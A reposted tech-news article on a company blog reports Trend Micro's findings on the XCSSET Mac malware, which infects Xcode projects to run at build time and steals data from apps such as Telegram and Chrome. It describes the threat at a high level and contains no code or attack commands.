Snynet Solution Logo
MON - SUN: 10 AM - 6 PM
+60 11 5624 8319


This devious Mac malware has developers in its crosshairs

Image Description

Malware analysts have shared new details about the infamous XCSSET malware that targets Mac devices around the world.

XCSSET first came into the spotlight in August 2020, when it was spotted inside Apple projects developed using the free Xcode integrated development environment (IDE). A variant of the malware was then discovered designed specifically to target M1-powered Macs.

Now, cybersecurity researchers at Trend Micro have once again found an updated version of the malware that’s taken on new features and can target popular apps including Telegram and Google Chrome.

TechRadar needs you!

We're looking at how our readers use VPNs with streaming sites like Netflix so we can improve our content and offer better advice. This survey won't take more than 60 seconds of your time, and you can also choose to enter the prize draw to win a $100 Amazon voucher or one of five 1-year ExpressVPN subscriptions.

>> Click here to start the survey in a new window

“The changes we’ve encountered in XCSSET do not reflect a fundamental change in its behavior but do constitute refinements in its tactics,” note the researchers in a blog post analyzing XCSSET’s information stealing capabilities.

Targeting developers

The XCSSET malware is particularly troublesome since its infection mechanism can be used to launch supply-chain-like attacks.

The malware works by injecting malicious code into local Xcode projects, which executes every time the project is built. This poses an issue not just for the developers, but also for any downstream users that run the software infected with the malware.

Trend Micro has been monitoring the malware since last year and recently learnt how it steals information. Using the examples of Telegram and Google Chrome, the researchers explained how the malware exfiltrates information to its command and control (C2) servers.  

“Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory,” say the researchers, asking application developers not to store sensitive data, such as login information, in the sandbox directory.

Besides Telegram, and Chrome, Trend Micro also found scripts that targeted other popular apps as well including Opera, Skype, Evernote, WeChat, and more.


26 Jul 2021



Other Blog

  • Microsoft is making the Windows 10 update process a whole lot easier

    Get everything you need in a Windows 10 update bundled in one download.

    Read More
  • The perfect way to ensure festive protection for all your devices

    Stay safe this Christmas with our top security tips.

    Read More
  • Google in firefighting mode against Indian startups, developers

    Google is hosting a webinar today with Indian app developers, startup founders and other stakeholders, as it looks to address concerns over its policies for the Play Store.

    Read More
  • Stolen UK consumer data up for sale on sale online

    Cybercriminals are selling stolen data pertaining to UK consumers on the dark web.

    Read More

Find Out More About Us

Want to hire best people for your project? Look no further you came to the right place!

Contact Us